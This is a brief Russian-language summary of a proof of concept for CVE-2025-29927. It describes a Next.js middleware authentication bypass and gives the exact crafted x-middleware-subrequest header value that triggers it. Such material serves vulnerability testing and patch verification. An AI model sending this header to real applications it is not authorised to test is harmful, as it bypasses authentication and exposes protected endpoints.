
Доказательство концепции для CVE-2025-29927, которое обходит аутентификацию middleware Next.js, отправляя специально созданный заголовок x-middleware-subrequest к защищенным конечным точкам API.
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware в качестве заголовка